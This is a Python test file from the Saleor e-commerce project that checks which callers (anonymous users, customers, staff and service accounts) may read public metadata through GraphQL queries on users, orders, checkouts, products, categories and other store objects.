"CC-BY-4.0"
] | 14
|
2021-02-02T23:28:13.000Z
|
2022-03-12T01:00:31.000Z
|
tests/api/test_meta_queries.py
|
sebasgoldberg/saleor
|
2e94e8df80f305889434f549a4da6abc1257b598
|
[
"CC-BY-4.0"
] | 4
|
2020-05-08T07:17:03.000Z
|
2020-05-16T12:34:57.000Z
|
import graphene
from tests.api.utils import assert_no_permission, get_graphql_content
PRIVATE_KEY = "private_key"
PRIVATE_VALUE = "private_vale"
PUBLIC_KEY = "key"
PUBLIC_VALUE = "value"
QUERY_SELF_PUBLIC_META = """
{
me{
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_me_as_customer(user_api_client):
    """A customer can read their own public metadata through the `me` query."""
    user = user_api_client.user
    user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    user.save(update_fields=["metadata"])

    response = user_api_client.post_graphql(QUERY_SELF_PUBLIC_META)

    entry = get_graphql_content(response)["data"]["me"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_me_as_staff(staff_api_client):
    """A staff user can read their own public metadata through the `me` query."""
    user = staff_api_client.user
    user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    user.save(update_fields=["metadata"])

    response = staff_api_client.post_graphql(QUERY_SELF_PUBLIC_META)

    entry = get_graphql_content(response)["data"]["me"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_USER_PUBLIC_META = """
query userMeta($id: ID!){
user(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_customer_as_staff(
    staff_api_client, permission_manage_users, customer_user
):
    """Staff with MANAGE_USERS can read a customer's public metadata."""
    customer_user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    customer_user.save(update_fields=["metadata"])
    user_id = graphene.Node.to_global_id("User", customer_user.pk)

    response = staff_api_client.post_graphql(
        QUERY_USER_PUBLIC_META, {"id": user_id}, [permission_manage_users]
    )

    entry = get_graphql_content(response)["data"]["user"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_customer_as_service_account(
    service_account_api_client, permission_manage_users, customer_user
):
    """A service account with MANAGE_USERS can read a customer's public metadata."""
    customer_user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    customer_user.save(update_fields=["metadata"])
    user_id = graphene.Node.to_global_id("User", customer_user.pk)

    response = service_account_api_client.post_graphql(
        QUERY_USER_PUBLIC_META, {"id": user_id}, [permission_manage_users]
    )

    entry = get_graphql_content(response)["data"]["user"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_staff_as_other_staff(
    staff_api_client, permission_manage_staff, admin_user
):
    """Staff with MANAGE_STAFF can read another staff user's public metadata."""
    admin_user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    admin_user.save(update_fields=["metadata"])
    user_id = graphene.Node.to_global_id("User", admin_user.pk)

    response = staff_api_client.post_graphql(
        QUERY_USER_PUBLIC_META, {"id": user_id}, [permission_manage_staff]
    )

    entry = get_graphql_content(response)["data"]["user"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_staff_as_service_account(
    service_account_api_client, permission_manage_staff, admin_user
):
    """A service account with MANAGE_STAFF can read a staff user's public metadata."""
    admin_user.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    admin_user.save(update_fields=["metadata"])
    user_id = graphene.Node.to_global_id("User", admin_user.pk)

    response = service_account_api_client.post_graphql(
        QUERY_USER_PUBLIC_META, {"id": user_id}, [permission_manage_staff]
    )

    entry = get_graphql_content(response)["data"]["user"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_CHECKOUT_PUBLIC_META = """
query checkoutMeta($token: UUID!){
checkout(token: $token){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_checkout_as_anonymous_user(api_client, checkout):
    """An unowned checkout's public metadata is readable by anyone with its token."""
    checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    checkout.save(update_fields=["metadata"])

    response = api_client.post_graphql(
        QUERY_CHECKOUT_PUBLIC_META, {"token": checkout.pk}
    )

    entry = get_graphql_content(response)["data"]["checkout"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_other_customer_checkout_as_anonymous_user(
    api_client, checkout, customer_user
):
    """A checkout owned by a customer is hidden from anonymous users."""
    checkout.user = customer_user
    checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    checkout.save(update_fields=["user", "metadata"])

    response = api_client.post_graphql(
        QUERY_CHECKOUT_PUBLIC_META, {"token": checkout.pk}
    )

    assert not get_graphql_content(response)["data"]["checkout"]


def test_query_public_meta_for_checkout_as_customer(user_api_client, checkout):
    """The checkout owner can read their own checkout's public metadata."""
    checkout.user = user_api_client.user
    checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    checkout.save(update_fields=["user", "metadata"])

    response = user_api_client.post_graphql(
        QUERY_CHECKOUT_PUBLIC_META, {"token": checkout.pk}
    )

    entry = get_graphql_content(response)["data"]["checkout"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_checkout_as_staff(
    staff_api_client, checkout, customer_user, permission_manage_checkouts
):
    """Staff with MANAGE_CHECKOUTS can read a customer checkout's public metadata."""
    checkout.user = customer_user
    checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    checkout.save(update_fields=["user", "metadata"])

    response = staff_api_client.post_graphql(
        QUERY_CHECKOUT_PUBLIC_META,
        {"token": checkout.pk},
        [permission_manage_checkouts],
        check_no_permissions=False,  # Remove after fix #5245
    )

    entry = get_graphql_content(response)["data"]["checkout"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_checkout_as_service_account(
    service_account_api_client, checkout, customer_user, permission_manage_checkouts
):
    """A service account with MANAGE_CHECKOUTS can read checkout public metadata."""
    checkout.user = customer_user
    checkout.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    checkout.save(update_fields=["user", "metadata"])

    response = service_account_api_client.post_graphql(
        QUERY_CHECKOUT_PUBLIC_META,
        {"token": checkout.pk},
        [permission_manage_checkouts],
        check_no_permissions=False,  # Remove after fix #5245
    )

    entry = get_graphql_content(response)["data"]["checkout"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_ORDER_BY_TOKEN_PUBLIC_META = """
query orderMeta($token: UUID!){
orderByToken(token: $token){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_order_by_token_as_anonymous_user(api_client, order):
    """Anyone holding the order token can read its public metadata."""
    order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    order.save(update_fields=["metadata"])

    response = api_client.post_graphql(
        QUERY_ORDER_BY_TOKEN_PUBLIC_META, {"token": order.token}
    )

    entry = get_graphql_content(response)["data"]["orderByToken"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_order_by_token_as_customer(user_api_client, order):
    """The order owner can read the order's public metadata via its token."""
    order.user = user_api_client.user
    order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    order.save(update_fields=["user", "metadata"])

    response = user_api_client.post_graphql(
        QUERY_ORDER_BY_TOKEN_PUBLIC_META, {"token": order.token}
    )

    entry = get_graphql_content(response)["data"]["orderByToken"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_order_by_token_as_staff(
    staff_api_client, order, customer_user, permission_manage_orders
):
    """Staff with MANAGE_ORDERS can read an order's public metadata by token."""
    order.user = customer_user
    order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    order.save(update_fields=["user", "metadata"])

    response = staff_api_client.post_graphql(
        QUERY_ORDER_BY_TOKEN_PUBLIC_META,
        {"token": order.token},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["orderByToken"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_order_by_token_as_service_account(
    service_account_api_client, order, customer_user, permission_manage_orders
):
    """A service account with MANAGE_ORDERS can read order public metadata by token."""
    order.user = customer_user
    order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    order.save(update_fields=["user", "metadata"])

    response = service_account_api_client.post_graphql(
        QUERY_ORDER_BY_TOKEN_PUBLIC_META,
        {"token": order.token},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["orderByToken"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_ORDER_PUBLIC_META = """
query orderMeta($id: ID!){
order(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_order_as_anonymous_user(api_client, order):
    """The `order(id:)` query is permission-gated: anonymous access is rejected."""
    order_id = graphene.Node.to_global_id("Order", order.pk)

    response = api_client.post_graphql(QUERY_ORDER_PUBLIC_META, {"id": order_id})

    assert_no_permission(response)


def test_query_public_meta_for_order_as_customer(user_api_client, order):
    """Even the order owner cannot use the staff-only `order(id:)` query."""
    order.user = user_api_client.user
    order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    order.save(update_fields=["user", "metadata"])
    order_id = graphene.Node.to_global_id("Order", order.pk)

    response = user_api_client.post_graphql(QUERY_ORDER_PUBLIC_META, {"id": order_id})

    assert_no_permission(response)


def test_query_public_meta_for_order_as_staff(
    staff_api_client, order, customer_user, permission_manage_orders
):
    """Staff with MANAGE_ORDERS can read an order's public metadata by ID."""
    order.user = customer_user
    order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    order.save(update_fields=["user", "metadata"])
    order_id = graphene.Node.to_global_id("Order", order.pk)

    response = staff_api_client.post_graphql(
        QUERY_ORDER_PUBLIC_META,
        {"id": order_id},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["order"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_order_as_service_account(
    service_account_api_client, order, customer_user, permission_manage_orders
):
    """A service account with MANAGE_ORDERS can read order public metadata by ID."""
    order.user = customer_user
    order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    order.save(update_fields=["user", "metadata"])
    order_id = graphene.Node.to_global_id("Order", order.pk)

    response = service_account_api_client.post_graphql(
        QUERY_ORDER_PUBLIC_META,
        {"id": order_id},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["order"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_DRAFT_ORDER_PUBLIC_META = """
query draftOrderMeta($id: ID!){
order(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_draft_order_as_anonymous_user(api_client, draft_order):
    """Draft orders are staff-only: anonymous access is rejected."""
    variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}

    response = api_client.post_graphql(QUERY_DRAFT_ORDER_PUBLIC_META, variables)

    assert_no_permission(response)


def test_query_public_meta_for_draft_order_as_customer(user_api_client, draft_order):
    """Even the draft order's own customer cannot query it by ID."""
    draft_order.user = user_api_client.user
    draft_order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    draft_order.save(update_fields=["user", "metadata"])
    variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}

    response = user_api_client.post_graphql(QUERY_DRAFT_ORDER_PUBLIC_META, variables)

    assert_no_permission(response)


def test_query_public_meta_for_draft_order_as_staff(
    staff_api_client, draft_order, customer_user, permission_manage_orders
):
    """Staff with MANAGE_ORDERS can read a draft order's public metadata."""
    draft_order.user = customer_user
    draft_order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    draft_order.save(update_fields=["user", "metadata"])
    variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}

    response = staff_api_client.post_graphql(
        QUERY_DRAFT_ORDER_PUBLIC_META,
        variables,
        [permission_manage_orders],
        check_no_permissions=False,
    )
    content = get_graphql_content(response)

    metadata = content["data"]["order"]["metadata"][0]
    assert metadata["key"] == PUBLIC_KEY
    assert metadata["value"] == PUBLIC_VALUE


def test_query_public_meta_for_draft_order_as_service_account(
    service_account_api_client, draft_order, customer_user, permission_manage_orders
):
    """A service account with MANAGE_ORDERS can read draft-order public metadata."""
    draft_order.user = customer_user
    draft_order.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    draft_order.save(update_fields=["user", "metadata"])
    variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}

    response = service_account_api_client.post_graphql(
        # Fix: was QUERY_ORDER_PUBLIC_META — a copy-paste slip; every other
        # draft-order test posts the draft-order query constant.
        QUERY_DRAFT_ORDER_PUBLIC_META,
        variables,
        [permission_manage_orders],
        check_no_permissions=False,
    )
    content = get_graphql_content(response)

    metadata = content["data"]["order"]["metadata"][0]
    assert metadata["key"] == PUBLIC_KEY
    assert metadata["value"] == PUBLIC_VALUE
QUERY_FULFILLMENT_PUBLIC_META = """
query fulfillmentMeta($token: UUID!){
orderByToken(token: $token){
fulfillments{
metadata{
key
value
}
}
}
}
"""
def test_query_public_meta_for_fulfillment_as_anonymous_user(
    api_client, fulfilled_order
):
    """Anyone holding the order token can read fulfillment public metadata."""
    fulfillment = fulfilled_order.fulfillments.first()
    fulfillment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    fulfillment.save(update_fields=["metadata"])

    response = api_client.post_graphql(
        QUERY_FULFILLMENT_PUBLIC_META, {"token": fulfilled_order.token}
    )

    content = get_graphql_content(response)
    entry = content["data"]["orderByToken"]["fulfillments"][0]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_fulfillment_as_customer(
    user_api_client, fulfilled_order
):
    """The order owner can read fulfillment public metadata via the order token."""
    fulfillment = fulfilled_order.fulfillments.first()
    fulfillment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    fulfillment.save(update_fields=["metadata"])
    fulfilled_order.user = user_api_client.user
    fulfilled_order.save(update_fields=["user"])

    response = user_api_client.post_graphql(
        QUERY_FULFILLMENT_PUBLIC_META, {"token": fulfilled_order.token}
    )

    content = get_graphql_content(response)
    entry = content["data"]["orderByToken"]["fulfillments"][0]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_fulfillment_as_staff(
    staff_api_client, fulfilled_order, customer_user, permission_manage_orders
):
    """Staff with MANAGE_ORDERS can read fulfillment public metadata."""
    fulfillment = fulfilled_order.fulfillments.first()
    fulfillment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    fulfillment.save(update_fields=["metadata"])
    fulfilled_order.user = customer_user
    fulfilled_order.save(update_fields=["user"])

    response = staff_api_client.post_graphql(
        QUERY_FULFILLMENT_PUBLIC_META,
        {"token": fulfilled_order.token},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    content = get_graphql_content(response)
    entry = content["data"]["orderByToken"]["fulfillments"][0]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_fulfillment_as_service_account(
    service_account_api_client, fulfilled_order, customer_user, permission_manage_orders
):
    """A service account with MANAGE_ORDERS can read fulfillment public metadata."""
    fulfillment = fulfilled_order.fulfillments.first()
    fulfillment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    fulfillment.save(update_fields=["metadata"])
    fulfilled_order.user = customer_user
    fulfilled_order.save(update_fields=["user"])

    response = service_account_api_client.post_graphql(
        QUERY_FULFILLMENT_PUBLIC_META,
        {"token": fulfilled_order.token},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    content = get_graphql_content(response)
    entry = content["data"]["orderByToken"]["fulfillments"][0]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_ATTRIBUTE_PUBLIC_META = """
query attributeMeta($id: ID!){
attribute(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_attribute_as_anonymous_user(api_client, color_attribute):
    """Attribute public metadata is readable without authentication."""
    color_attribute.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    color_attribute.save(update_fields=["metadata"])
    attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.pk)

    response = api_client.post_graphql(
        QUERY_ATTRIBUTE_PUBLIC_META, {"id": attribute_id}
    )

    entry = get_graphql_content(response)["data"]["attribute"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_attribute_as_customer(user_api_client, color_attribute):
    """Attribute public metadata is readable by a logged-in customer."""
    color_attribute.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    color_attribute.save(update_fields=["metadata"])
    attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.pk)

    response = user_api_client.post_graphql(
        QUERY_ATTRIBUTE_PUBLIC_META, {"id": attribute_id}
    )

    entry = get_graphql_content(response)["data"]["attribute"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_attribute_as_staff(
    staff_api_client, color_attribute, permission_manage_products
):
    """Attribute public metadata is readable by staff with MANAGE_PRODUCTS."""
    color_attribute.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    color_attribute.save(update_fields=["metadata"])
    attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.pk)

    response = staff_api_client.post_graphql(
        QUERY_ATTRIBUTE_PUBLIC_META,
        {"id": attribute_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["attribute"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_attribute_as_service_account(
    service_account_api_client, color_attribute, permission_manage_products
):
    """Attribute public metadata is readable by a privileged service account."""
    color_attribute.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    color_attribute.save(update_fields=["metadata"])
    attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.pk)

    response = service_account_api_client.post_graphql(
        QUERY_ATTRIBUTE_PUBLIC_META,
        {"id": attribute_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["attribute"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_CATEGORY_PUBLIC_META = """
query categoryMeta($id: ID!){
category(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_category_as_anonymous_user(api_client, category):
    """Category public metadata is readable without authentication."""
    category.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    category.save(update_fields=["metadata"])
    category_id = graphene.Node.to_global_id("Category", category.pk)

    response = api_client.post_graphql(QUERY_CATEGORY_PUBLIC_META, {"id": category_id})

    entry = get_graphql_content(response)["data"]["category"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_category_as_customer(user_api_client, category):
    """Category public metadata is readable by a logged-in customer."""
    category.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    category.save(update_fields=["metadata"])
    category_id = graphene.Node.to_global_id("Category", category.pk)

    response = user_api_client.post_graphql(
        QUERY_CATEGORY_PUBLIC_META, {"id": category_id}
    )

    entry = get_graphql_content(response)["data"]["category"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_category_as_staff(
    staff_api_client, category, permission_manage_products
):
    """Category public metadata is readable by staff with MANAGE_PRODUCTS."""
    category.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    category.save(update_fields=["metadata"])
    category_id = graphene.Node.to_global_id("Category", category.pk)

    response = staff_api_client.post_graphql(
        QUERY_CATEGORY_PUBLIC_META,
        {"id": category_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["category"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_category_as_service_account(
    service_account_api_client, category, permission_manage_products
):
    """Category public metadata is readable by a privileged service account."""
    category.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    category.save(update_fields=["metadata"])
    category_id = graphene.Node.to_global_id("Category", category.pk)

    response = service_account_api_client.post_graphql(
        QUERY_CATEGORY_PUBLIC_META,
        {"id": category_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["category"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_COLLECTION_PUBLIC_META = """
query collectionMeta($id: ID!){
collection(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_collection_as_anonymous_user(api_client, collection):
    """Collection public metadata is readable without authentication."""
    collection.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    collection.save(update_fields=["metadata"])
    collection_id = graphene.Node.to_global_id("Collection", collection.pk)

    response = api_client.post_graphql(
        QUERY_COLLECTION_PUBLIC_META, {"id": collection_id}
    )

    entry = get_graphql_content(response)["data"]["collection"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_collection_as_customer(user_api_client, collection):
    """Collection public metadata is readable by a logged-in customer."""
    collection.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    collection.save(update_fields=["metadata"])
    collection_id = graphene.Node.to_global_id("Collection", collection.pk)

    response = user_api_client.post_graphql(
        QUERY_COLLECTION_PUBLIC_META, {"id": collection_id}
    )

    entry = get_graphql_content(response)["data"]["collection"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_collection_as_staff(
    staff_api_client, collection, permission_manage_products
):
    """Collection public metadata is readable by staff with MANAGE_PRODUCTS."""
    collection.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    collection.save(update_fields=["metadata"])
    collection_id = graphene.Node.to_global_id("Collection", collection.pk)

    response = staff_api_client.post_graphql(
        QUERY_COLLECTION_PUBLIC_META,
        {"id": collection_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["collection"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_collection_as_service_account(
    service_account_api_client, collection, permission_manage_products
):
    """Collection public metadata is readable by a privileged service account."""
    collection.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    collection.save(update_fields=["metadata"])
    collection_id = graphene.Node.to_global_id("Collection", collection.pk)

    response = service_account_api_client.post_graphql(
        QUERY_COLLECTION_PUBLIC_META,
        {"id": collection_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["collection"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_DIGITAL_CONTENT_PUBLIC_META = """
query digitalContentMeta($id: ID!){
digitalContent(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_digital_content_as_anonymous_user(
    api_client, digital_content
):
    """Digital content is permission-gated: anonymous access is rejected."""
    content_id = graphene.Node.to_global_id("DigitalContent", digital_content.pk)

    response = api_client.post_graphql(
        QUERY_DIGITAL_CONTENT_PUBLIC_META, {"id": content_id}
    )

    assert_no_permission(response)


def test_query_public_meta_for_digital_content_as_customer(
    user_api_client, digital_content
):
    """Digital content is permission-gated: plain customers are rejected."""
    digital_content.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    digital_content.save(update_fields=["metadata"])
    content_id = graphene.Node.to_global_id("DigitalContent", digital_content.pk)

    response = user_api_client.post_graphql(
        QUERY_DIGITAL_CONTENT_PUBLIC_META, {"id": content_id}
    )

    assert_no_permission(response)


def test_query_public_meta_for_digital_content_as_staff(
    staff_api_client, digital_content, permission_manage_products
):
    """Staff with MANAGE_PRODUCTS can read digital-content public metadata."""
    digital_content.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    digital_content.save(update_fields=["metadata"])
    content_id = graphene.Node.to_global_id("DigitalContent", digital_content.pk)

    response = staff_api_client.post_graphql(
        QUERY_DIGITAL_CONTENT_PUBLIC_META,
        {"id": content_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["digitalContent"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_digital_content_as_service_account(
    service_account_api_client, digital_content, permission_manage_products
):
    """A privileged service account can read digital-content public metadata."""
    digital_content.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    digital_content.save(update_fields=["metadata"])
    content_id = graphene.Node.to_global_id("DigitalContent", digital_content.pk)

    response = service_account_api_client.post_graphql(
        QUERY_DIGITAL_CONTENT_PUBLIC_META,
        {"id": content_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["digitalContent"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_PRODUCT_PUBLIC_META = """
query productsMeta($id: ID!){
product(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_product_as_anonymous_user(api_client, product):
    """Product public metadata is readable without authentication."""
    product.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    product.save(update_fields=["metadata"])
    product_id = graphene.Node.to_global_id("Product", product.pk)

    response = api_client.post_graphql(QUERY_PRODUCT_PUBLIC_META, {"id": product_id})

    entry = get_graphql_content(response)["data"]["product"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_product_as_customer(user_api_client, product):
    """Product public metadata is readable by a logged-in customer."""
    product.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    product.save(update_fields=["metadata"])
    product_id = graphene.Node.to_global_id("Product", product.pk)

    response = user_api_client.post_graphql(
        QUERY_PRODUCT_PUBLIC_META, {"id": product_id}
    )

    entry = get_graphql_content(response)["data"]["product"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_product_as_staff(
    staff_api_client, product, permission_manage_products
):
    """Product public metadata is readable by staff with MANAGE_PRODUCTS."""
    product.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    product.save(update_fields=["metadata"])
    product_id = graphene.Node.to_global_id("Product", product.pk)

    response = staff_api_client.post_graphql(
        QUERY_PRODUCT_PUBLIC_META,
        {"id": product_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["product"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_product_as_service_account(
    service_account_api_client, product, permission_manage_products
):
    """Product public metadata is readable by a privileged service account."""
    product.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    product.save(update_fields=["metadata"])
    product_id = graphene.Node.to_global_id("Product", product.pk)

    response = service_account_api_client.post_graphql(
        QUERY_PRODUCT_PUBLIC_META,
        {"id": product_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["product"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_PRODUCT_TYPE_PUBLIC_META = """
query productTypeMeta($id: ID!){
productType(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_product_type_as_anonymous_user(api_client, product_type):
    """Product-type public metadata is readable without authentication."""
    product_type.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    product_type.save(update_fields=["metadata"])
    type_id = graphene.Node.to_global_id("ProductType", product_type.pk)

    response = api_client.post_graphql(QUERY_PRODUCT_TYPE_PUBLIC_META, {"id": type_id})

    entry = get_graphql_content(response)["data"]["productType"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_product_type_as_customer(user_api_client, product_type):
    """Product-type public metadata is readable by a logged-in customer."""
    product_type.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    product_type.save(update_fields=["metadata"])
    type_id = graphene.Node.to_global_id("ProductType", product_type.pk)

    response = user_api_client.post_graphql(
        QUERY_PRODUCT_TYPE_PUBLIC_META, {"id": type_id}
    )

    entry = get_graphql_content(response)["data"]["productType"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


